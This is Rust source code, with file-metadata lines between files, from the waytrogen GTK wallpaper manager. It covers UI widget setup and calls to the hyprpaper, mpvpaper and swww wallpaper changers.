#[weak] settings, move |_factory, item| { let item = item.downcast_ref::<ListItem>().unwrap(); let button = item.child().and_downcast::<Button>().unwrap(); let entry = item.item().and_downcast::<BoxedAnyObject>().unwrap(); let image: Ref<GtkPictureFile> = entry.borrow(); let path = &image.cache_image_file.path; let args = args.clone(); button.set_size_request(THUMBNAIL_WIDTH, THUMBNAIL_HEIGHT); let previous_wallpapers_text_buffer = previous_wallpapers_text_buffer.clone(); let handler = image.button_signal_handler.take(); match handler { Some(h) => image.button_signal_handler.replace(Some(h)), None => image .button_signal_handler .replace(Some(button.connect_clicked(clone!( #[strong] path, move |_| { let path = path.clone(); let selected_monitor = monitors_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string(); let selected_changer = get_selected_changer(&wallpaper_changers_dropdown, &settings); let mut previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); let mut new_monitor_wallpapers: Vec<Wallpaper> = vec![]; if !previous_wallpapers .iter() .any(|w| w.monitor == selected_monitor.clone()) { new_monitor_wallpapers.push(Wallpaper { monitor: selected_monitor.clone(), path: path.clone(), changer: selected_changer.clone(), }); } for wallpaper in &mut previous_wallpapers { if wallpaper.monitor == selected_monitor { wallpaper.path.clone_from(&path); wallpaper.changer = selected_changer.clone(); } } previous_wallpapers.append(&mut new_monitor_wallpapers); let previous_wallpapers = previous_wallpapers .clone() .into_iter() .map(|w| Wallpaper { monitor: w.monitor, path: w.path, changer: selected_changer.clone(), }) .collect::<Vec<_>>(); debug!( "{}: {:#?}", gettext("Saved wallpapers"), previous_wallpapers ); let saved_wallpapers = string_to_gschema_string( &serde_json::to_string::<Vec<Wallpaper>>(&previous_wallpapers) .unwrap(), ); previous_wallpapers_text_buffer.set_text(&saved_wallpapers); debug!("{}: {}", gettext("Stored Text"), saved_wallpapers); selected_changer .clone() .change(PathBuf::from(&path.clone()), selected_monitor.clone()); execute_external_script(&args, &path, &selected_monitor, &settings); } )))), }; button.set_tooltip_text(Some(&image.cache_image_file.name)); button.set_child(Some(&image.picture)); } )); } fn execute_external_script(args: &Cli, path: &str, selected_monitor: &str, settings: &Settings) { if args.external_script.is_some() { match Command::new(args.external_script.as_ref().unwrap()) .arg(selected_monitor) .arg(path) .arg(gschema_string_to_string(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), ))) .spawn() { Ok(_) => { log::debug!("External Script Executed Successfully"); } Err(e) => { log::warn!("External Script Failed to Execute: {e}"); } } } } #[must_use] pub fn create_open_folder_button( folder_path_buffer: &TextBuffer, window: &ApplicationWindow, ) -> Button { let open_folder_button = Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .label(ngettext("Image Folder", "Images Folder", 2)) .build(); let folder_path_buffer_copy = folder_path_buffer.clone(); open_folder_button.connect_clicked(clone!( #[weak] window, move |_| { let dialog = FileDialog::builder() .accept_label("Select Folder") .title("Wallpapers Folder") .build(); let copy = folder_path_buffer_copy.clone(); dialog.select_folder(Some(&window), Cancellable::NONE, move |d| { if let Ok(f) = d { copy.set_text(f.path().unwrap().canonicalize().unwrap().to_str().unwrap()); } }); } )); open_folder_button } fn create_monitors_dropdown(settings: &Settings) -> DropDown { let mut monitors = get_available_monitors(); monitors.insert(0, gettext("All")); let selected_monitor_text_buffer = TextBuffer::builder().build(); debug!("{:?}", monitors); settings .bind( "selected-monitor-item", &selected_monitor_text_buffer, "text", ) .build(); selected_monitor_text_buffer.set_text(settings.string("selected-monitor-item").as_ref()); let monitors_dropdown = DropDown::from_strings( &monitors .iter() .map(std::string::String::as_str) .collect::<Vec<_>>(), ); monitors_dropdown.set_halign(Align::End); monitors_dropdown.set_valign(Align::Center); monitors_dropdown.set_margin_top(12); monitors_dropdown.set_margin_start(12); monitors_dropdown.set_margin_bottom(12); monitors_dropdown.set_margin_end(12); settings .bind("monitor", &monitors_dropdown, "selected") .build(); monitors_dropdown.connect_selected_notify(clone!( #[weak] settings, move |i| { let selected_monitor = i .selected_item() .and_downcast::<StringObject>() .unwrap() .string() .to_string(); selected_monitor_text_buffer.set_text(&selected_monitor); settings .bind( "selected-monitor-item", &selected_monitor_text_buffer, "text", ) .build(); } )); monitors_dropdown } fn create_wallpaper_changers_dropdown() -> DropDown { let wallpaper_changers_dropdown = get_available_wallpaper_changers() .into_iter() .map(|c| c.to_string()) .collect::<Vec<_>>(); let wallpaper_changers_dropdown = DropDown::from_strings( wallpaper_changers_dropdown .iter() .map(std::string::String::as_str) .collect::<Vec<_>>() .as_slice(), ); wallpaper_changers_dropdown.set_halign(Align::End); wallpaper_changers_dropdown.set_halign(Align::Center); wallpaper_changers_dropdown.set_margin_top(12); wallpaper_changers_dropdown.set_margin_start(12); wallpaper_changers_dropdown.set_margin_bottom(12); wallpaper_changers_dropdown.set_margin_end(12); wallpaper_changers_dropdown } fn create_image_grid( image_signal_list_item_factory: &SignalListItemFactory, image_list_store: &ListStore, ) -> GridView { let selection = SingleSelection::builder() .model(&image_list_store.clone()) .autoselect(false) .build(); GridView::builder() .model(&selection) .factory(image_signal_list_item_factory) .max_columns(30) .min_columns(3) .focusable(true) .single_click_activate(true) .focus_on_click(true) .build() } fn create_folder_path_buffer(settings: &Settings) -> TextBuffer { let folder_path_buffer = TextBuffer::builder().build(); settings .bind("wallpaper-folder", &folder_path_buffer, "text") .build(); folder_path_buffer } fn create_image_grid_scrolled_window(image_grid: &GridView) -> ScrolledWindow { ScrolledWindow::builder() .child(image_grid) .valign(Align::Fill) .halign(Align::Fill) .propagate_natural_height(true) .propagate_natural_width(true) .hexpand(true) .vexpand(true) .build() } fn create_sort_dropdown(settings: &Settings) -> DropDown { let strings = SORT_DROPDOWN_STRINGS .into_iter() .map(gettext) .collect::<Vec<_>>(); let strings = strings.iter().map(String::as_str).collect::<Vec<_>>(); let sort_dropdown = DropDown::from_strings(&strings); sort_dropdown.set_halign(Align::End); sort_dropdown.set_valign(Align::Center); sort_dropdown.set_margin_top(12); sort_dropdown.set_margin_start(12); sort_dropdown.set_margin_bottom(12); sort_dropdown.set_margin_end(12); settings.bind("sort-by", &sort_dropdown, "selected").build(); sort_dropdown } fn create_invert_sort_switch(settings: &Settings) -> (Switch, Text) { let switch = Switch::builder() .margin_top(12) .margin_bottom(12) .margin_start(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .build(); let text = Text::builder() .text(gettext("Invert Sort")) .margin_start(3) .margin_top(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .build(); settings.bind("invert-sort", &switch, "active").build(); (switch, text) } fn connect_sorting_signals( sort_dropdown: &DropDown, invert_sort_switch: &Switch, image_list_store: &ListStore, image_grid: &GridView, ) { sort_dropdown.connect_selected_notify(clone!( #[strong] invert_sort_switch, #[weak] image_list_store, #[weak] image_grid, move |d| { sort_images(d, &invert_sort_switch, &image_list_store, &image_grid); } )); invert_sort_switch.connect_state_notify(clone!( #[weak] sort_dropdown, #[weak] image_list_store, #[weak] image_grid, move |s| { sort_images(&sort_dropdown, s, &image_list_store, &image_grid); } )); } fn connect_wallpaper_changers_signals( wallpaper_changers_dropdown: &DropDown, invert_sort_switch: &Switch, monitors_dropdown: &DropDown, settings: &Settings, sort_dropdown: &DropDown, changer_specific_options_box: Box, (image_list_store, removed_images_list_store): (&ListStore, &ListStore), ) { wallpaper_changers_dropdown.connect_selected_item_notify(clone!( #[weak] image_list_store, #[weak] monitors_dropdown, #[weak] settings, #[weak] sort_dropdown, #[strong] invert_sort_switch, #[strong] removed_images_list_store, move |w| { change_image_button_handlers(&image_list_store, w, &monitors_dropdown, &settings); hide_unsupported_files( &image_list_store, &get_selected_changer(w, &settings), &removed_images_list_store, &sort_dropdown, &invert_sort_switch, settings.string("image-filter").as_ref(), ); generate_changer_bar( &changer_specific_options_box, &get_selected_changer(w, &settings), settings, ); } )); settings .bind("changer", wallpaper_changers_dropdown, "selected") .build(); } fn create_options_menu_button( invert_sort_switch: &Switch, invert_sort_switch_label: &Text, ) -> MenuButton { let options_box = Box::builder().orientation(Orientation::Vertical).build(); let sort_invert_box = Box::builder().orientation(Orientation::Horizontal).build(); sort_invert_box.append(invert_sort_switch_label); sort_invert_box.append(invert_sort_switch); options_box.append(&sort_invert_box); let options_popover_menu = Popover::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .child(&options_box) .build(); MenuButton::builder() .popover(&options_popover_menu) .halign(Align::Start) .valign(Align::Center) .margin_start(12) .margin_top(12) .margin_bottom(12) .margin_end(12) .label(gettext("Options")) .build() } fn create_changer_options_box(hidden: bool) -> Box { let changer_options_box = Box::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .valign(Align::Center) .halign(Align::Center) .hexpand(true) .orientation(Orientation::Horizontal); let changer_options_box = changer_options_box.visible(!hidden); changer_options_box.build() } fn connect_folder_path_buffer_signals( folder_path_buffer: &TextBuffer, image_list_store: &ListStore, invert_sort_switch: &Switch, (sender_enable_changer_options_bar, sender_images_loading_progress_bar): ( Sender<bool>, Sender<f64>, ), selected_sort_method: &str, sender_cache_images: Sender<CacheImageFile>, ) { let selected_sort_method = selected_sort_method.to_string(); folder_path_buffer.connect_changed(clone!( #[weak] image_list_store, #[strong] invert_sort_switch, #[strong] sender_enable_changer_options_bar, #[strong] sender_images_loading_progress_bar, #[strong] selected_sort_method, move |f| { let path = f.text(&f.start_iter(), &f.end_iter(), false).to_string(); image_list_store.remove_all(); let state = invert_sort_switch.state(); let selected_sort_method = selected_sort_method.to_string(); spawn_blocking(clone!( #[strong] sender_enable_changer_options_bar, #[strong] sender_images_loading_progress_bar, #[strong] selected_sort_method, #[strong] sender_cache_images, move || { generate_image_files( path.clone(), sender_cache_images, selected_sort_method, state, sender_enable_changer_options_bar, sender_images_loading_progress_bar, ); } )); } )); } fn create_application_box() -> Box { Box::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .orientation(Orientation::Vertical) .build() } fn selected_item_as_string(dropdown: &DropDown) -> String { dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string() } fn create_changer_specific_options_box() -> Box { Box::builder() .halign(Align::Start) .valign(Align::Center) .hexpand(true) .orientation(Orientation::Horizontal) .build() } fn create_cache_image_future( image_list_store: &ListStore, receiver_cache_images: Receiver<CacheImageFile>, ) { spawn_future_local(clone!( #[weak] image_list_store, async move { while let Ok(image) = receiver_cache_images.recv().await { image_list_store.append(&BoxedAnyObject::new(GtkPictureFile { picture: Picture::for_paintable( &Texture::from_bytes(&Bytes::from(&image.image)).unwrap(), ), cache_image_file: image, button_signal_handler: RefCell::new(None), })); } } )); } fn create_images_loading_progress_bar() -> ProgressBar { ProgressBar::builder() .opacity(1.0) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Center) .valign(Align::Center) .text(gettext("Images are loading, please wait")) .show_text(true) .visible(true) .sensitive(true) .build() } fn create_disable_ui_future(sensitive_widgets_helper: SensitiveWidgetsHelper) { spawn_future_local(clone!(async move { while let Ok(b) = sensitive_widgets_helper .receiver_changer_options_bar .recv() .await { debug!("{}", gettext("Finished loading images")); sensitive_widgets_helper .images_loading_progress_bar .set_visible(!b); sensitive_widgets_helper.monitors_dropdown.set_sensitive(b); sensitive_widgets_helper .clone() .sort_dropdown .set_sensitive(b); sensitive_widgets_helper .clone() .invert_sort_switch .set_sensitive(b); sensitive_widgets_helper .wallpaper_changers_dropdown .set_sensitive(b); sensitive_widgets_helper .changer_specific_options_box .set_sensitive(b); sensitive_widgets_helper.image_grid.set_sensitive(b); if b { debug!("{}", gettext("Hiding unsupported images")); hide_unsupported_files( &sensitive_widgets_helper.clone().image_list_store, &get_selected_changer( &sensitive_widgets_helper.wallpaper_changers_dropdown, &sensitive_widgets_helper.clone().settings, ), &sensitive_widgets_helper.clone().removed_images_list_store, &sensitive_widgets_helper.clone().sort_dropdown, &sensitive_widgets_helper.clone().invert_sort_switch, sensitive_widgets_helper .settings .string("image-filter") .as_ref(), ); sensitive_widgets_helper.image_list_store.sort( compare_image_list_items_by_sort_selection_comparitor( sensitive_widgets_helper.sort_dropdown.clone(), sensitive_widgets_helper.invert_sort_switch.clone(), ), ); sensitive_widgets_helper .image_grid .scroll_to(0, ListScrollFlags::NONE, None); } } })); } fn create_progress_image_loading_progress_bar_future( receiver_images_loading_progress_bar: Receiver<f64>, images_loading_progress_bar: ProgressBar, ) { spawn_future_local(clone!(async move { while let Ok(f) = receiver_images_loading_progress_bar.recv().await { images_loading_progress_bar.set_fraction(f); } })); } fn create_application_window(app: &Application) -> ApplicationWindow { let window = ApplicationWindow::builder() .application(app) .title("Watering") .build(); window.set_default_size(1024, 600); window.present(); window } fn textbuffer_to_string(text_buffer: &TextBuffer) -> String { text_buffer .text(&text_buffer.start_iter(), &text_buffer.end_iter(), false) .to_string() } fn create_no_changers_window(window: &ApplicationWindow) { let application_box = create_application_box(); let text_box = Box::builder() .halign(Align::Center) .valign(Align::Center) .orientation(Orientation::Horizontal) .build(); let confirm_button = Button::builder() .label(gettext("Ok")) .vexpand(true) .hexpand(true) .can_shrink(true) .has_tooltip(true) .tooltip_text(gettext("Close waytrogen")) .valign(Align::End) .halign(Align::Center) .hexpand(true) .build(); let error_message_label = Label::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext( "No wallpaper changers detected.\n Please install one or more of the following:\n\n - Hyprpaper\n - Swaybg\n - Mpvpaper\n - SWWW\n\n If waytrogen continues failing to detect an installed changer,\n please feel free open issue on the GitHub repository:\n https://github.com/nikolaizombie1/waytrogen/issues", )) .halign(Align::Center) .valign(Align::Center) .build(); confirm_button.connect_clicked(clone!( #[strong] window, move |_| { window.close(); } )); text_box.append(&error_message_label); application_box.append(&text_box); application_box.append(&confirm_button); window.set_child(Some(&application_box)); } fn create_image_filter_entry( settings: &Settings, image_list_store: &ListStore, monitors_dropdown: &DropDown, sort_dropdown: &DropDown, invert_sort_switch: &Switch, removed_images_list_store: &ListStore, wallpaper_changers_dropdown: &DropDown, ) -> Entry { let entry = Entry::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .placeholder_text(gettext("Find images")) .has_tooltip(true) .tooltip_text(gettext( "Filter wallpapers based on the name. Fuzzy matching the name.", )) .build(); settings .bind("image-filter", &entry.buffer(), "text") .build(); entry.connect_activate(clone!( #[strong] image_list_store, #[strong] monitors_dropdown, #[strong] settings, #[strong] sort_dropdown, #[strong] invert_sort_switch, #[strong] removed_images_list_store, #[strong] wallpaper_changers_dropdown, move |e| { change_image_button_handlers( &image_list_store, &wallpaper_changers_dropdown, &monitors_dropdown, &settings, ); hide_unsupported_files( &image_list_store,
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
true
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/hyprpaper.rs
src/hyprpaper.rs
use gettextrs::gettext; use log::{debug, error, warn}; use std::{path::Path, process::Command, thread, time::Duration}; use which::which; pub fn change_hyprpaper_wallpaper(image: &Path, monitor: &str) { debug!("Starting hyprpaper"); if !Command::new("pgrep") .arg("hyprpaper") .spawn() .unwrap() .wait() .unwrap() .success() { match Command::new("systemctl") .arg("--user") .arg("start") .arg("hyprpaper") .spawn() .unwrap() .wait() { Ok(_) => {} Err(_) => match which("hyprpaper") { Ok(_) => { warn!("Hyprpaper could not be started using Systemd. Attempting to start using command line interface"); #[allow(clippy::zombie_processes)] Command::new("hyprpaper").spawn().unwrap(); } Err(_) => { error!("Wallpaper could not be changed: Failed to start hyprpaper using Systemd and command line interface."); return; } }, } } thread::sleep(Duration::from_millis(200)); Command::new("hyprctl") .arg("hyprpaper") .arg("unload") .arg("all") .spawn() .unwrap() .wait() .unwrap(); thread::sleep(Duration::from_millis(200)); Command::new("hyprctl") .arg("hyprpaper") .arg("preload") .arg(image.as_os_str()) .spawn() .unwrap() .wait() .unwrap(); thread::sleep(Duration::from_millis(200)); let monitor = if monitor == gettext("All") { "" } else { monitor }; Command::new("hyprctl") .arg("hyprpaper") .arg("wallpaper") .arg(format!("{},{}", monitor, image.to_str().unwrap())) .spawn() .unwrap() .wait() .unwrap(); }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/mpvpaper.rs
src/mpvpaper.rs
use crate::wallpaper_changers::{ MpvPaperPauseModes, MpvPaperSlideshowSettings, WallpaperChanger, WallpaperChangers, }; use gettextrs::gettext; use gtk::{ gio::Settings, glib::clone, prelude::*, Adjustment, Align, Box, DropDown, Entry, SpinButton, StringObject, Switch, TextBuffer, }; use std::{ path::{Path, PathBuf}, process::Command, }; const ALL_MONITOR_SOCKET: &str = "/tmp/mpv-socket-All"; pub fn change_mpvpaper_wallpaper( mpvpaper_changer: &WallpaperChangers, image: PathBuf, monitor: &str, ) { if let WallpaperChangers::MpvPaper(pause_mode, slideshow, mpv_options) = mpvpaper_changer { log::debug!("{}", image.display()); let mut command = Command::new("mpvpaper"); let socket = if monitor == gettext("All") { String::from(ALL_MONITOR_SOCKET) } else { format!("/tmp/mpv-socket-{monitor}") }; let mpv_options = format!("input-ipc-server={socket} {mpv_options}"); let monitor = if monitor == gettext("All") { "*" } else { monitor }; command.arg("-o").arg(mpv_options); match pause_mode { MpvPaperPauseModes::None => {} MpvPaperPauseModes::AutoPause => { command.arg("--auto-pause"); } MpvPaperPauseModes::AutoStop => { command.arg("--auto-stop"); } } if slideshow.enable { command.arg("-n").arg(slideshow.seconds.to_string()); } let socket_path = std::path::Path::new(&socket); if socket_path.exists() { log::debug!("Attempting to close socket."); Command::new("bash") .arg("-c") .arg(format!("echo quit | socat - {socket}")) .spawn() .unwrap() .wait() .unwrap(); Command::new("rm") .arg(socket) .spawn() .unwrap() .wait() .unwrap(); } let all_monitor_socket_exists = std::path::Path::new(ALL_MONITOR_SOCKET).exists(); if all_monitor_socket_exists && monitor != gettext("All") { Command::new("bash") .arg("-c") .arg(format!("echo quit | socat - {ALL_MONITOR_SOCKET}")) .spawn() .unwrap() .wait() .unwrap(); } else if all_monitor_socket_exists && monitor == gettext("All") { mpvpaper_changer.kill(); } command .arg(monitor) .arg(image) .arg("-f") .spawn() .unwrap() .wait() .unwrap(); } } pub fn generate_mpvpaper_changer_bar(changer_specific_options_box: &Box, settings: Settings) { let pause_options_dropdown = DropDown::from_strings(&[ &gettext("none"), &gettext("auto-pause"), &gettext("auto-stop"), ]); pause_options_dropdown.set_margin_top(12); pause_options_dropdown.set_margin_start(12); pause_options_dropdown.set_margin_bottom(12); pause_options_dropdown.set_margin_end(12); pause_options_dropdown.set_halign(Align::Start); pause_options_dropdown.set_valign(Align::Center); settings .bind("mpvpaper-pause-option", &pause_options_dropdown, "selected") .build(); changer_specific_options_box.append(&pause_options_dropdown); let slideshow_enable_switch = Switch::builder() .tooltip_text(gettext("Enable slideshow for the current folder.")) .has_tooltip(true) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build(); let adjustment = Adjustment::new(5.0, 1.0, f64::MAX, 1.0, 0.0, 0.0); let spin_button = SpinButton::builder() .adjustment(&adjustment) .numeric(true) .has_tooltip(true) .tooltip_text(gettext("Slideshow change interval")) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build(); changer_specific_options_box.append(&slideshow_enable_switch); changer_specific_options_box.append(&spin_button); settings .bind( "mpvpaper-slideshow-enable", &slideshow_enable_switch, "active", ) .build(); settings .bind("mpvpaper-slideshow-interval", &spin_button, "value") .build(); let mpv_options = create_mpv_options_textbox(&settings); changer_specific_options_box.append(&mpv_options); slideshow_enable_switch.connect_state_set(clone!(move |_, state| { if state { let pause_mode = pause_options_dropdown .selected_item() .and_downcast::<StringObject>() .unwrap() .string() .to_string() .parse::<MpvPaperPauseModes>() .unwrap(); let interval = spin_button.value() as u32; let options = mpv_options.text().to_string(); let slideshow_settings = MpvPaperSlideshowSettings { enable: state, seconds: interval, }; let varient = WallpaperChangers::MpvPaper(pause_mode, slideshow_settings, options); let path = settings.string("wallpaper-folder").to_string(); let monitor = settings.string("selected-monitor-item").to_string(); log::debug!( "{}: {:#?} {} {}", gettext("Entered switch callback"), varient, path, monitor ); varient.change(Path::new(&path).to_path_buf(), monitor); } false.into() })); } fn create_mpv_options_textbox(settings: &Settings) -> Entry { let mpv_options = Entry::builder() .placeholder_text(gettext("Additional mpv options")) .has_tooltip(true) .tooltip_text(gettext( "Additional command line options to be sent to mpv.", )) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .halign(Align::Start) .valign(Align::Center) .build(); let mpv_options_text_buffer = TextBuffer::builder().build(); settings .bind( "mpvpaper-additional-options", &mpv_options_text_buffer, "text", ) .build(); mpv_options.connect_changed(clone!( #[strong] mpv_options_text_buffer, move |e| { let text = &e.text().to_string()[..]; mpv_options_text_buffer.set_text(text); } )); mpv_options.set_text( mpv_options_text_buffer .text( &mpv_options_text_buffer.start_iter(), &mpv_options_text_buffer.end_iter(), false, ) .as_str(), ); mpv_options }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/swww.rs
src/swww.rs
use crate::{ common::RGB, wallpaper_changers::{ SWWWScallingFilter, SWWWTransitionBezier, SWWWTransitionPosition, U32Enum, WallpaperChangers, }, }; use gettextrs::gettext; use gtk::{ gdk::RGBA, gio::Settings, glib::{self, clone}, prelude::*, Adjustment, Align, Box, Button, ColorDialog, ColorDialogButton, DropDown, Entry, Label, SpinButton, Switch, TextBuffer, Window, }; use log::debug; use std::{path::PathBuf, process::Command}; pub fn change_swww_wallpaper(swww_changer: WallpaperChangers, image: PathBuf, monitor: String) { if let WallpaperChangers::Swww( resize_modes, fill_color, scalling_filter, transition_type, transition_step, transition_duration, transition_fps, transition_angle, transition_position, invert_y, transition_bezier, transition_wave, ) = swww_changer { debug!("Starting swww daemon"); Command::new("swww-daemon").spawn().unwrap().wait().unwrap(); let mut command = Command::new("swww"); command .arg("img") .arg("--resize") .arg(resize_modes.to_string()) .arg("--fill-color") .arg(fill_color.to_string()); if monitor != gettext("All") { command.arg("--outputs").arg(monitor); } command .arg("--filter") .arg(scalling_filter.to_string()) .arg("--transition-type") .arg(transition_type.to_string()) .arg("--transition-step") .arg(transition_step.to_string()) .arg("--transition-duration") .arg(transition_duration.to_string()) .arg("--transition-fps") .arg(transition_fps.to_string()) .arg("--transition-angle") .arg(transition_angle.to_string()) .arg("--transition-pos") .arg(transition_position.to_string()); if invert_y { command.arg("--invert-y"); } command .arg("--transition-bezier") .arg(transition_bezier.to_string()) .arg("--transition-wave") .arg(transition_wave.to_string()) .arg(image) .spawn() .unwrap() .wait() .unwrap(); } } pub fn generate_swww_changer_bar(changer_specific_options_box: &Box, settings: Settings) { let resize_dropdown = DropDown::from_strings(&[&gettext("no"), &gettext("crop"), &gettext("fit")]); resize_dropdown.set_margin_top(12); resize_dropdown.set_margin_start(12); resize_dropdown.set_margin_bottom(12); resize_dropdown.set_margin_end(12); resize_dropdown.set_halign(Align::Start); resize_dropdown.set_valign(Align::Center); changer_specific_options_box.append(&resize_dropdown); settings .bind("swww-resize", &resize_dropdown, "selected") .build(); let color_dialog = ColorDialog::builder().with_alpha(false).build(); let color_picker = ColorDialogButton::builder() .halign(Align::Start) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .dialog(&color_dialog) .build(); let rgb_text_buffer = TextBuffer::builder().build(); color_picker.connect_rgba_notify(clone!( #[weak] settings, move |b| { let rgba = b.rgba(); let serialize_struct = RGB { red: rgba.red(), green: rgba.green(), blue: rgba.blue(), } .to_string(); rgb_text_buffer.set_text(&serialize_struct); settings .bind("swww-fill-color", &rgb_text_buffer, "text") .build(); } )); let rgb = settings .string("swww-fill-color") .to_string() .parse::<RGB>() .unwrap(); color_picker.set_rgba( &RGBA::builder() .red(rgb.red) .green(rgb.green) .blue(rgb.blue) .build(), ); changer_specific_options_box.append(&color_picker); let advanced_settings_window = Window::builder() .title(gettext("SWWW Advanced Image Settings")) .hide_on_close(true) .build(); let advanced_settings_button = Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext("Advanced Settings")) .halign(Align::Start) .valign(Align::Center) .build(); changer_specific_options_box.append(&advanced_settings_button); connect_advanced_settings_window_signals( &advanced_settings_button, advanced_settings_window, settings, ); } fn connect_advanced_settings_window_signals( advanced_settings_button: &Button, advanced_settings_window: Window, settings: Settings, ) { advanced_settings_button.connect_clicked(move |_| { let advanced_settings_window_box = Box::builder() .orientation(gtk::Orientation::Vertical) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .build(); advanced_settings_window.present(); advanced_settings_window.set_child(Some(&advanced_settings_window_box)); let filter_options_label = create_label("Scalling filter"); let filter_dropdown = create_filter_dropdown(&settings); let transition_type_label = create_label("Transition type"); let transition_type_dropdown = create_transition_type_dropdown(&settings); let filter_and_transition_box = create_category_box(); filter_and_transition_box.append(&filter_options_label); filter_and_transition_box.append(&filter_dropdown); filter_and_transition_box.append(&transition_type_label); filter_and_transition_box.append(&transition_type_dropdown); advanced_settings_window_box.append(&filter_and_transition_box); let transition_step_label = create_label("Transition step"); let transition_step_adjustment = Adjustment::new(90.0, 0.0, f64::from(u8::MAX), 1.0, 0.0, 0.0); let transition_step_spinbutton = create_spinbutton(&transition_step_adjustment); settings .bind("swww-transition-step", &transition_step_spinbutton, "value") .build(); let transition_duration_label = create_label("Transition duration"); let transition_duration_adjustment = Adjustment::new(3.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_duration_spinbutton = create_spinbutton(&transition_duration_adjustment); settings .bind( "swww-transition-duration", &transition_duration_spinbutton, "value", ) .build(); let transition_angle_label = create_label("Transition angle"); let transition_angle_adjustment = Adjustment::new(45.0, 0.0, 270.0, 1.0, 0.0, 0.0); let transition_angle_spinbutton = create_spinbutton(&transition_angle_adjustment); settings .bind( "swww-transition-angle", &transition_angle_spinbutton, "value", ) .build(); let transition_step_duration_angle_box = create_category_box(); transition_step_duration_angle_box.append(&transition_step_label); transition_step_duration_angle_box.append(&transition_step_spinbutton); transition_step_duration_angle_box.append(&transition_duration_label); transition_step_duration_angle_box.append(&transition_duration_spinbutton); transition_step_duration_angle_box.append(&transition_angle_label); transition_step_duration_angle_box.append(&transition_angle_spinbutton); advanced_settings_window_box.append(&transition_step_duration_angle_box); let transition_position_label = create_label("Transition position"); let transition_position_entry = create_transition_position_entry(); let transition_position_entry_text_buffer = TextBuffer::builder().build(); settings .bind( "swww-transition-position", &transition_position_entry_text_buffer, "text", ) .build(); transition_position_entry.set_text( transition_position_entry_text_buffer .text( &transition_position_entry_text_buffer.start_iter(), &transition_position_entry_text_buffer.end_iter(), false, ) .as_ref(), ); transition_position_entry.connect_changed(move |e| { let text = e.text().to_string(); if SWWWTransitionPosition::new(&text).is_ok() { transition_position_entry_text_buffer.set_text(&text); } }); let invert_y_label = create_label("Invert Y"); let invert_y_switch = create_switch("Invert y position in transition position flag"); settings .bind("swww-invert-y", &invert_y_switch, "active") .build(); let transition_wave_label = create_label("Transition wave"); let transition_wave_width_adjustment = Adjustment::new(20.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_wave_width_spinbutton = create_spinbutton(&transition_wave_width_adjustment); settings .bind( "swww-transition-wave-width", &transition_wave_width_spinbutton, "value", ) .build(); let transition_wave_height_adjustment = Adjustment::new(20.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_wave_height_spinbutton = create_spinbutton(&transition_wave_height_adjustment); settings .bind( "swww-transition-wave-height", &transition_wave_height_spinbutton, "value", ) .build(); let transition_position_invert_y_wave_box = create_category_box(); transition_position_invert_y_wave_box.append(&transition_position_label); transition_position_invert_y_wave_box.append(&transition_position_entry); transition_position_invert_y_wave_box.append(&invert_y_label); transition_position_invert_y_wave_box.append(&invert_y_switch); transition_position_invert_y_wave_box.append(&transition_wave_label); transition_position_invert_y_wave_box.append(&transition_wave_width_spinbutton); transition_position_invert_y_wave_box.append(&transition_wave_height_spinbutton); advanced_settings_window_box.append(&transition_position_invert_y_wave_box); let transition_bezier_label = create_label("Transition bezier"); let transition_bezier_adjustments = Adjustment::new(0.0, f64::MIN, f64::MAX, 0.01, 0.0, 0.0); let transition_bezier_p0_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p0", &transition_bezier_p0_spinbutton, "value", ) .build(); let transition_bezier_p1_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p1", &transition_bezier_p1_spinbutton, "value", ) .build(); let transition_bezier_p2_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p2", &transition_bezier_p2_spinbutton, "value", ) .build(); let transition_bezier_p3_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p3", &transition_bezier_p3_spinbutton, "value", ) .build(); let transition_bezier_fps_box = 